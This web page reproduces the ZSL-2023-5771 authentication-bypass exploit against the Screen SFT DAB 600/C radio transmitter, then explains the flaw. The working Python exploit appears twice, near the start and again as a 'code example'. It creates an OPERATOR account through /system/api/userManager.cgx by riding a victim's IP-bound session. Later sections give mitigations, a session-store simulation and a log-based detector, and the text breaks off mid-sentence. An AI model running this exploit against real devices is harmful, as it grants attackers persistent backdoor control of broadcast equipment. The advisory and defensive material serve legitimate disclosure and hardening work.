Screen SFT DAB 600/C - Authentication Bypass Account Creation
```python
#!/usr/bin/env python3
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one waits for such an established
# session and issues unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5771
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
#
#
# 19.03.2023
#
import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
# The user manager takes an MD5 hex digest of the password, not the clear text
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')
t='http://'+t+e
# No cookie or token is sent: the request rides on the source IP alone
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber++',
'Connection':'close'}
# JSON body for the userManager::newUser call; creates an OPERATOR account
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'newUser':{
'password':h,
'type':'OPERATOR',
'username':u
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
    exit(-5)
```

Screen SFT DAB 600/C – Authentication Bypass via Session Management Flaw
Security vulnerabilities in industrial and broadcast equipment often go unnoticed due to their niche nature and limited public exposure. However, when such flaws are discovered, they can pose serious risks to operational integrity, especially in environments where remote access and automated management are critical. One such vulnerability was recently identified in the Screen SFT DAB 600/C digital radio transmitter, a high-performance device used in DAB, DAB+, and T-DMB broadcasting systems.
Vulnerability Overview: Weak Session Management and IP-Based Authentication
The Screen SFT DAB Series Compact Radio Transmitter (specifically the 600/C model) runs an embedded Linux platform, MontaVista CGX, with the Keil-EWEB/2.1 web server. The affected build is firmware 1.9.3 with BIOS 7.1 (April 19, 2021), GUI 2.46, FPGA 169.55 and uc 6.15. Whatever its signal-processing merits, the device's web session management is broken in a way that lets an unauthenticated client act on behalf of a logged-in one.
According to advisory ZSL-2023-5771 by Gjoko 'LiquidWorm' Krstic, the server associates an established session with the client's source IP address rather than with a secret the client holds. Any request arriving from that IP while the session is alive is treated as belonging to the session. An attacker who presents the same source IP as a legitimate user, most simply because both sit behind the same NAT gateway, therefore inherits the user's session without ever supplying credentials.
With that session the attacker can call the management API: the published exploit creates a new user account, and the same mechanism covers the other operations the API exposes for managing and manipulating the transmitter.
Exploitation Mechanism: Abuse of IP Binding to Session ID
Here is how the exploit works in practice:
- The victim logs in via the web interface, and the server records the session against the victim's source IP address.
- The attacker arranges to present that same source IP, either by sharing the victim's NAT gateway (the case the advisory describes) or by taking over the address on the local network.
- Because the session lookup keys on the IP, the attacker's requests are accepted as the victim's even though they carry no cookie, token or credentials.
- API endpoints such as /system/api/userManager.cgx therefore accept management calls from the attacker.
This is session hijacking through IP-based session binding, a design that no networked system should rely on: a source IP is neither secret nor unique to one client.
Code Example: Exploiting Account Creation via API
```python
#!/usr/bin/env python3
import hashlib
import requests
import colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT + '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
''' + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT + '''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
''' + Style.RESET_ALL)

# User input
t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
p = input('Enter desired password: ')

# The user manager takes an MD5 hex digest of the password, so the digest
# (not the clear-text password) goes into the request, as in the original exploit
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')

# Construct API URL
e = '/system/api/userManager.cgx'
url = 'http://' + t + e

# Headers mimicking a legitimate browser client. No cookie or token is sent:
# the request is accepted on the strength of the source IP alone.
bh = {
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'ku-MK,en;q=0.9',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36'
}

# Body for userManager::newUser, in the JSON shape the device's API expects
# (ssbtIdx / ssbtType / ssbtObj, same as the original exploit). The account
# created is of type OPERATOR.
j = {
    'ssbtIdx': 0,
    'ssbtType': 'userManager',
    'ssbtObj': {
        'newUser': {
            'password': h,
            'type': 'OPERATOR',
            'username': u
        }
    }
}

# Send request
try:
    response = requests.post(url, headers=bh, json=j, timeout=10)
    if response.status_code == 200:
        print(Fore.GREEN + Style.BRIGHT + 'SUCCESS: User created via bypassed authentication!' + Style.RESET_ALL)
    else:
        print(Fore.YELLOW + Style.BRIGHT + f'Failed: HTTP {response.status_code}' + Style.RESET_ALL)
except requests.RequestException as exc:
    print(Fore.RED + Style.BRIGHT + f'Error: {exc}' + Style.RESET_ALL)
```
Explanation: This script reproduces the request from the original exploit. The attacker supplies the transmitter's IP address and the username and password of the account to be created. The password is sent as an MD5 hex digest rather than in clear text, which is the form the device's user manager accepts (the original exploit does the same and labels the digest "sig").
The request carries no session cookie or authentication token. It succeeds only while the attacker's source IP matches one that already has an established session, because the server's session check keys on the IP rather than on a secret the client holds. The endpoint /system/api/userManager.cgx then processes the newUser call and creates an account of type OPERATOR, which persists after the victim's session ends.
Security Implications and Real-World Impact
Such vulnerabilities are particularly dangerous in broadcast infrastructure:
- Unauthorized access to control systems can lead to signal disruption or unauthorized transmission.
- Creation of backdoor accounts allows persistent access even after the original user logs out.
- Exploitation needs only a vantage point on the same network (or behind the same NAT), so insiders and compromised hosts on the management LAN are enough to trigger it.
For broadcasters, this could result in regulatory violations, content tampering, or loss of audience trust—especially if malicious actors broadcast unauthorized content.
Recommended Mitigations and Best Practices
The following changes remove this class of flaw:
| Recommendation | Explanation |
|---|---|
| Decouple Session ID from IP Address | Session identifiers should be tied to cryptographic tokens (e.g., JWT or random session keys), not static IP addresses. |
| Implement Session Timeout and Renewal | Active sessions should expire after a set period and require re-authentication. |
| Use HTTPS and Certificate Validation | Secure communication prevents interception and replay attacks. |
| Enforce Role-Based Access Control (RBAC) | Limit user creation privileges to only authorized roles. |
| Log and Monitor API Access | Track unauthorized or suspicious API calls for forensic analysis. |
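To make the first recommendation concrete, and to show why the exploit scenario above works at all, here is an added example (not code from the advisory or the vendor) that models the transmitter's session handling two ways: a store that keys sessions on the client's source IP, and a store that keys them on a random token held only by the authenticated client, with an idle timeout. The request model, host addresses, usernames and the `new_user_handler` stand-in for userManager::newUser are all constructed for the example.

```python
import secrets
import time
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal model of what the transmitter's HTTP server sees per request
    (constructed for this example)."""
    client_ip: str
    user_agent: str
    cookies: dict = field(default_factory=dict)


class IpBoundSessionStore:
    """The flawed design: login marks the client's source IP as authenticated,
    and any later request from that IP inherits the session. Two hosts behind
    one NAT gateway present the same source IP, so the second one is
    indistinguishable from the first."""

    def __init__(self):
        self._user_by_ip = {}

    def login(self, req, username):
        self._user_by_ip[req.client_ip] = username
        return None  # nothing for the client to hold on to

    def current_user(self, req):
        return self._user_by_ip.get(req.client_ip)


class TokenBoundSessionStore:
    """The hardened design: login mints an unguessable token that only the
    authenticated client holds; it comes back as a cookie and expires after
    `ttl_seconds` of inactivity. The source IP plays no part in the lookup."""

    def __init__(self, ttl_seconds=600, clock=time.monotonic):
        self._by_token = {}  # token -> (username, last_seen)
        self._ttl = ttl_seconds
        self._clock = clock

    def login(self, req, username):
        token = secrets.token_urlsafe(32)
        self._by_token[token] = (username, self._clock())
        return token

    def current_user(self, req):
        token = req.cookies.get("session")
        entry = self._by_token.get(token)
        if entry is None:
            return None
        username, last_seen = entry
        if self._clock() - last_seen > self._ttl:
            del self._by_token[token]  # idle timeout: force re-authentication
            return None
        self._by_token[token] = (username, self._clock())
        return username


def new_user_handler(store, req):
    """Stand-in for userManager::newUser: allowed only when the store can
    attribute the request to a logged-in user. Returns an HTTP-style status."""
    if store.current_user(req) is None:
        return 401
    return 200


def simulate():
    """Replay the advisory's scenario against both designs."""
    victim = Request("10.0.0.5", "Mozilla/5.0 (operator workstation)")
    # The attacker sits behind the same NAT, so the transmitter sees the same
    # source IP, but the attacker holds no cookie.
    attacker = Request("10.0.0.5", "Dabber++")
    results = {}

    ip_store = IpBoundSessionStore()
    ip_store.login(victim, "operator")
    results["ip_bound_attacker"] = new_user_handler(ip_store, attacker)  # 200: bypass

    fake_now = [1000.0]  # controllable clock so the timeout can be exercised
    tok_store = TokenBoundSessionStore(ttl_seconds=600, clock=lambda: fake_now[0])
    victim.cookies["session"] = tok_store.login(victim, "operator")
    results["token_bound_victim"] = new_user_handler(tok_store, victim)      # 200
    results["token_bound_attacker"] = new_user_handler(tok_store, attacker)  # 401
    fake_now[0] += 601  # idle past the timeout
    results["token_bound_victim_after_timeout"] = new_user_handler(tok_store, victim)  # 401
    return results


if __name__ == "__main__":
    for name, code in simulate().items():
        print(f"{name}: HTTP {code}")
```

The token store also gives the second recommendation (timeout and renewal) for free: every successful lookup refreshes `last_seen`, and an idle session is dropped on its next use. The IP-bound store has no equivalent, which is why a backdoor account created through it survives the victim logging out.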
Vendor Response and Patch Status
Advisory ZSL-2023-5771 is dated 19 March 2023 and covers firmware 1.9.3 (BIOS 7.1, GUI 2.46, FPGA 169.55, uc 6.15). A fixed firmware version is not identified in the material reproduced here, so that version should be assumed vulnerable until the vendor states otherwise. In the meantime, operators should:
- Disable remote access to the web interface if it is not required.
- Restrict network access to the transmitter to a small set of trusted management hosts, and do not place those hosts behind a NAT gateway shared with other users, since a shared source IP is all the attack needs.
- Apply firewall rules so that only those hosts can reach the /system/api/ endpoints.
- Monitor the device's web interface for unexpected account changes and for the same source IP presenting more than one client.
Until a patch is applied, treat the device as potentially compromised if it has been reachable from untrusted networks.
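The last two points above can be turned into a detection. The following is an added example (not from the advisory) that runs two rules over web-server access logs: flag a source IP that presents more than one User-Agent within a time window, which is the footprint of two clients sharing an address, and flag a POST to /system/api/userManager.cgx made by a User-Agent other than the one that started the activity from that IP. The log lines are constructed for the example in a Combined-Log-like format; the transmitter's real log format, and every path other than userManager.cgx, are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: an operator's browser uses the device, then a second
# client from the same source IP (shared NAT) creates an account. 10.0.0.9 is
# a normal single-client host included as a negative case.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2023:10:00:01 +0000] "GET /system/ HTTP/1.1" 200 1044 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/110.0"
10.0.0.5 - - [19/Mar/2023:10:00:07 +0000] "GET /system/api/status.cgx HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/110.0"
10.0.0.9 - - [19/Mar/2023:10:01:30 +0000] "GET /system/api/status.cgx HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/111.0"
10.0.0.5 - - [19/Mar/2023:10:03:12 +0000] "POST /system/api/userManager.cgx HTTP/1.1" 200 57 "-" "Dabber++"
10.0.0.9 - - [19/Mar/2023:10:04:00 +0000] "GET /system/api/status.cgx HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/111.0"
"""

USER_MGMT_PATH = "/system/api/userManager.cgx"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def detect(log_text, window_seconds=600):
    """Return alerts for IP/User-Agent switching and for account-management
    calls made by a secondary client on an already-active source IP."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(list)  # ip -> [(ts, ua)] seen within the window
    flagged = set()             # (ip, ua) pairs already reported for switching
    alerts = []
    for ev in events:
        ip, ts, ua = ev["ip"], ev["ts"], ev["ua"]
        hist = recent[ip]
        hist[:] = [(t, u) for t, u in hist if (ts - t).total_seconds() <= window_seconds]
        other_uas = sorted({u for _, u in hist if u != ua})
        if other_uas and (ip, ua) not in flagged:
            flagged.add((ip, ua))
            alerts.append({"rule": "ua_switch", "ip": ip, "ua": ua,
                           "other_uas": other_uas, "ts": ts})
        if ev["method"] == "POST" and ev["path"] == USER_MGMT_PATH and other_uas:
            alerts.append({"rule": "user_mgmt_from_secondary_ua", "ip": ip, "ua": ua,
                           "status": ev["status"], "ts": ts})
        hist.append((ts, ua))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["ts"].isoformat(), a["rule"], a["ip"], repr(a["ua"]))
```

A User-Agent switch on its own is only a weak signal (one person may use two browsers), so the second rule, which ties the switch to a call that changes accounts, is the one worth paging on. Run against the device's real logs, adjust `window_seconds` to the session lifetime the web interface actually uses.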
Conclusion: A Cautionary Tale for Embedded Systems Security
The Screen SFT DAB 600/C vulnerability underscores a fundamental truth: even advanced hardware can be undermined by poor software design. Authentication bypasses through session management flaws are not isolated incidents—they reflect a broader trend in embedded systems where security is often an afterthought.
For cybersecurity